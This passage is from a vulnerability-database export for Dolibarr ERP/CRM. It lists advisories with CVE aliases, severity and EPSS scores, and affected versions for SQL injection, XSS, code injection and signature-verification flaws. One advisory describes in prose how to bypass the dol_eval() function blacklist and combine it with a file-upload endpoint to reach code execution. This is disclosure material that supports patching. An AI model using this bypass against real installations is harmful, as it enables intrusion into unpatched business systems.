VCID-vwxd-syyk-jueh |
|
| 37 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 38 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 39 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 40 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 41 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@10.0.4 |
|
|
| aliases |
CVE-2019-19212, GHSA-pm57-926c-28mr
|
| risk_score |
4.5 |
| exploitability |
0.5 |
| weighted_severity |
9.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-e39t-gvd4-j7ag |
|
| 27 |
|
| 28 |
| url |
VCID-ehb1-ac3n-p7fv |
| vulnerability_id |
VCID-ehb1-ac3n-p7fv |
| summary |
SQL Injection
An SQL injection vulnerability in Dolibarr allows remote attackers to execute arbitrary SQL commands via vectors involving integer parameters without quotes. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@7.0.2 |
| purl |
pkg:composer/dolibarr/dolibarr@7.0.2 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1jh7-xexf-53cw |
|
| 2 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 3 |
| vulnerability |
VCID-2wnq-rrff-tbbt |
|
| 4 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 5 |
| vulnerability |
VCID-3ewz-9zgb-efa7 |
|
| 6 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 7 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 8 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 9 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 10 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 11 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 12 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 13 |
| vulnerability |
VCID-6ten-mcds-gbd7 |
|
| 14 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 15 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 16 |
| vulnerability |
VCID-7kz1-s7qf-aqan |
|
| 17 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 18 |
| vulnerability |
VCID-7txt-x88q-2bej |
|
| 19 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 20 |
| vulnerability |
VCID-b65k-vs97-63fj |
|
| 21 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 22 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 23 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 24 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 25 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 26 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 27 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 28 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 29 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 30 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 31 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 32 |
| vulnerability |
VCID-jy5f-3h8w-qqff |
|
| 33 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 34 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 35 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 36 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 37 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 38 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 39 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 40 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 41 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 42 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 43 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 44 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 45 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 46 |
| vulnerability |
VCID-vvsw-shzx-ufgv |
|
| 47 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 48 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 49 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 50 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 51 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 52 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@7.0.2 |
|
|
| aliases |
CVE-2018-10094, GHSA-57wj-22w9-wm9r
|
| risk_score |
10.0 |
| exploitability |
2.0 |
| weighted_severity |
9.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-ehb1-ac3n-p7fv |
|
| 29 |
| url |
VCID-ewrf-wdsh-kqgs |
| vulnerability_id |
VCID-ewrf-wdsh-kqgs |
| summary |
Dolibarr allows a remote privileged attacker to execute arbitrary code via a crafted command/script
An issue in Dolibarr ERP CRM v.17.0.1 and before allows a remote privileged attacker to execute arbitrary code via a crafted command/script. |
| references |
| 0 |
| reference_url |
http://dolibarr.com |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
7.2 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H |
|
| 1 |
| value |
HIGH |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
| 2 |
| value |
Track* |
| scoring_system |
ssvc |
| scoring_elements |
SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-25T15:03:16Z/ |
|
|
| url |
http://dolibarr.com |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
|
| fixed_packages |
|
| aliases |
CVE-2023-38886, GHSA-6773-rfjv-c54w
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-ewrf-wdsh-kqgs |
|
| 30 |
| url |
VCID-f122-u34a-kfcm |
| vulnerability_id |
VCID-f122-u34a-kfcm |
| summary |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Cross-site Scripting (XSS) - Stored in GitHub repository dolibarr/dolibarr prior to 16.0.5. |
| references |
|
| fixed_packages |
|
| aliases |
CVE-2023-5842, GHSA-9pjf-jw9q-fx49
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-f122-u34a-kfcm |
|
| 31 |
| url |
VCID-fa52-4y55-37br |
| vulnerability_id |
VCID-fa52-4y55-37br |
| summary |
Cross-site Scripting
Dolibarr ERP/CRM is affected by multiple reflected Cross-Site Scripting vulnerabilities. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2017-9838 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00185 |
| scoring_system |
epss |
| scoring_elements |
0.40005 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.00185 |
| scoring_system |
epss |
| scoring_elements |
0.40061 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00185 |
| scoring_system |
epss |
| scoring_elements |
0.40089 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.00185 |
| scoring_system |
epss |
| scoring_elements |
0.40087 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2017-9838 |
|
| 1 |
|
| 2 |
|
| 3 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@5.0.4 |
| purl |
pkg:composer/dolibarr/dolibarr@5.0.4 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-11u2-56qq-cye4 |
|
| 1 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 2 |
| vulnerability |
VCID-1jh7-xexf-53cw |
|
| 3 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 4 |
| vulnerability |
VCID-2wnq-rrff-tbbt |
|
| 5 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 6 |
| vulnerability |
VCID-3ewz-9zgb-efa7 |
|
| 7 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 8 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 9 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 10 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 11 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 12 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 13 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 14 |
| vulnerability |
VCID-6ten-mcds-gbd7 |
|
| 15 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 16 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 17 |
| vulnerability |
VCID-7kz1-s7qf-aqan |
|
| 18 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 19 |
| vulnerability |
VCID-7txt-x88q-2bej |
|
| 20 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 21 |
| vulnerability |
VCID-9xkp-4t9p-eqbb |
|
| 22 |
| vulnerability |
VCID-b65k-vs97-63fj |
|
| 23 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 24 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 25 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 26 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 27 |
| vulnerability |
VCID-ehb1-ac3n-p7fv |
|
| 28 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 29 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 30 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 31 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 32 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 33 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 34 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 35 |
| vulnerability |
VCID-jy5f-3h8w-qqff |
|
| 36 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 37 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 38 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 39 |
| vulnerability |
VCID-nmjf-yxwc-m7hj |
|
| 40 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 41 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 42 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 43 |
| vulnerability |
VCID-qrcg-mnfa-k7gv |
|
| 44 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 45 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 46 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 47 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 48 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 49 |
| vulnerability |
VCID-uzz6-3bze-mbez |
|
| 50 |
| vulnerability |
VCID-v5bc-wjmv-ubhx |
|
| 51 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 52 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 53 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 54 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 55 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 56 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 57 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 58 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
| 59 |
| vulnerability |
VCID-zjqj-1zrx-yqh6 |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@5.0.4 |
|
|
| aliases |
CVE-2017-9838, GHSA-726g-cgcq-4xw8
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-fa52-4y55-37br |
|
| 32 |
| url |
VCID-g3x8-rhqm-fuh2 |
| vulnerability_id |
VCID-g3x8-rhqm-fuh2 |
| summary |
Improper Input Validation
dolibarr is vulnerable to Business Logic Errors |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2022-0174 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00244 |
| scoring_system |
epss |
| scoring_elements |
0.47826 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.00244 |
| scoring_system |
epss |
| scoring_elements |
0.47876 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00244 |
| scoring_system |
epss |
| scoring_elements |
0.47893 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.00244 |
| scoring_system |
epss |
| scoring_elements |
0.47889 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2022-0174 |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@15.0.0 |
| purl |
pkg:composer/dolibarr/dolibarr@15.0.0 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 3 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 4 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 5 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 6 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 7 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 8 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 9 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 10 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 11 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 12 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 13 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 14 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 15 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 16 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 17 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 18 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 19 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 20 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 21 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 22 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 23 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 24 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 25 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@15.0.0 |
|
|
| aliases |
CVE-2022-0174, GHSA-8qvx-f5gf-g43v
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-g3x8-rhqm-fuh2 |
|
| 33 |
| url |
VCID-hrwp-s15m-ffa1 |
| vulnerability_id |
VCID-hrwp-s15m-ffa1 |
| summary |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
A Cross Site Scripting (XSS) vulnerability exists in Dolibarr via the ticket creation flow. Exploitation requires that an admin copies the payload into a box. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2021-42220 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00271 |
| scoring_system |
epss |
| scoring_elements |
0.50732 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.00271 |
| scoring_system |
epss |
| scoring_elements |
0.50778 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00271 |
| scoring_system |
epss |
| scoring_elements |
0.50798 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.00271 |
| scoring_system |
epss |
| scoring_elements |
0.50792 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2021-42220 |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@14.0.3 |
| purl |
pkg:composer/dolibarr/dolibarr@14.0.3 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 6 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 7 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 8 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 9 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 10 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 11 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 12 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 13 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 14 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 15 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 16 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 17 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 18 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 19 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 20 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 21 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 22 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 23 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 24 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 25 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 26 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 27 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 28 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 29 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@14.0.3 |
|
|
| aliases |
CVE-2021-42220, GHSA-jqfp-m5f8-vg28
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-hrwp-s15m-ffa1 |
|
| 34 |
| url |
VCID-htgn-37m4-c7fu |
| vulnerability_id |
VCID-htgn-37m4-c7fu |
| summary |
Dolibarr Allows Code Injection through its Website Module
In Dolibarr ERP & CRM <= 22.0.4, PHP code detection and editing permission enforcement in the Website module is not applied consistently to all input parameters, allowing an authenticated user restricted to HTML/JavaScript editing to inject PHP code through unprotected inputs during website page creation.
A patch is available at https://github.com/Dolibarr/dolibarr/releases/tag/23.0.0. |
| references |
| 0 |
| reference_url |
http://dolibarr.com |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
8.8 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
|
| 1 |
| value |
HIGH |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
| 2 |
| value |
Track |
| scoring_system |
ssvc |
| scoring_elements |
SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T15:30:39Z/ |
|
|
| url |
http://dolibarr.com |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
| 6 |
|
| 7 |
|
|
| fixed_packages |
|
| aliases |
CVE-2026-31018, GHSA-676v-wh57-p375
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-htgn-37m4-c7fu |
|
| 35 |
| url |
VCID-j345-dk2c-yfds |
| vulnerability_id |
VCID-j345-dk2c-yfds |
| summary |
Dolibarr has Remote Code Execution Vulnerability (Bypass)
The Dolibarr backend provides the function of adding Menu, and supports setting permissions for the added Menu:
This is the trigger point of the vulnerability. The submitted permission can be php code, and it will be executed when viewing the created Menu:
- htdocs/admin/menus/edit.php
As you can see, in edit.php, if the created menu is set to `$menu->perms`, the `dol_eval()` method will be called. Following the `dol_eval()` method, we can see that it will filter the dangerous php functions in `$menu->perms` through the `blacklist` set in `$forbiddenphpfunctions`:
However, the `blacklist` here is not comprehensive. For example, the `include_once` and `require_once` functions can easily pass the `blacklist` check, which will cause file inclusion vulnerabilities. Moreover, if the `allow_url_include` option is enabled in php.ini, arbitrary code execution will occur. **The most serious thing is that we can cooperate with the file upload at `/htdocs/user/document.php?id=1&uploadform=1` to achieve more general arbitrary code execution.** |
| references |
|
| fixed_packages |
|
| aliases |
GHSA-49xw-hw94-fmv2
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-j345-dk2c-yfds |
|
| 36 |
| url |
VCID-jbkd-su9m-3udy |
| vulnerability_id |
VCID-jbkd-su9m-3udy |
| summary |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Cross-site Scripting (XSS) - Generic in GitHub repository dolibarr/dolibarr prior to 18.0. |
| references |
|
| fixed_packages |
|
| aliases |
CVE-2023-5323, GHSA-39m3-cj8c-886r
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-jbkd-su9m-3udy |
|
| 37 |
| url |
VCID-jy5f-3h8w-qqff |
| vulnerability_id |
VCID-jy5f-3h8w-qqff |
| summary |
Dolibarr ERP/CRM allows SQL Injection. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@10.0.3 |
| purl |
pkg:composer/dolibarr/dolibarr@10.0.3 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 7 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 8 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 9 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 10 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 11 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 12 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 13 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 14 |
| vulnerability |
VCID-9fes-esxc-s7gw |
|
| 15 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 16 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 17 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 18 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 19 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 20 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 21 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 22 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 23 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 24 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 25 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 26 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 27 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 28 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 29 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 30 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 31 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 32 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 33 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 34 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 35 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 36 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 37 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 38 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 39 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 40 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 41 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 42 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 43 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 44 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@10.0.3 |
|
|
| aliases |
CVE-2019-19209, GHSA-jh3j-xfv2-f9m9
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-jy5f-3h8w-qqff |
|
| 38 |
| url |
VCID-k9nc-tze6-k7bx |
| vulnerability_id |
VCID-k9nc-tze6-k7bx |
| summary |
Dolibarr has Insufficient Verification of Data Authenticity
A security flaw has been discovered in Dolibarr ERP CRM up to 23.0.2. This vulnerability affects the function dol_verifyHash in the library htdocs/core/lib/security.lib.php of the component Online Signature Module. The manipulation results in improper verification of cryptographic signature. The attack may be performed from remote. Attacks of this nature are highly complex. It is stated that the exploitability is difficult. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. |
| references |
| 0 |
|
| 1 |
| reference_url |
https://gist.github.com/Shaon-Xis/d6ae069fc54f006457b68a91d5a8e158 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
2.6 |
| scoring_system |
cvssv2 |
| scoring_elements |
AV:N/AC:H/Au:N/C:N/I:P/A:N/E:POC/RL:ND/RC:UR |
|
| 1 |
| value |
3.7 |
| scoring_system |
cvssv3 |
| scoring_elements |
CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R |
|
| 2 |
| value |
3.7 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R |
|
| 3 |
| value |
3.7 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N |
|
| 4 |
| value |
2.9 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P |
|
| 5 |
| value |
6.3 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P |
|
| 6 |
| value |
LOW |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
| 7 |
| value |
Track |
| scoring_system |
ssvc |
| scoring_elements |
SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-04T13:07:21Z/ |
|
|
| url |
https://gist.github.com/Shaon-Xis/d6ae069fc54f006457b68a91d5a8e158 |
|
| 2 |
| reference_url |
https://github.com/Dolibarr/dolibarr |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
3.7 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N |
|
| 1 |
| value |
2.9 |
| scoring_system |
cvssv4 |
| scoring_elements |
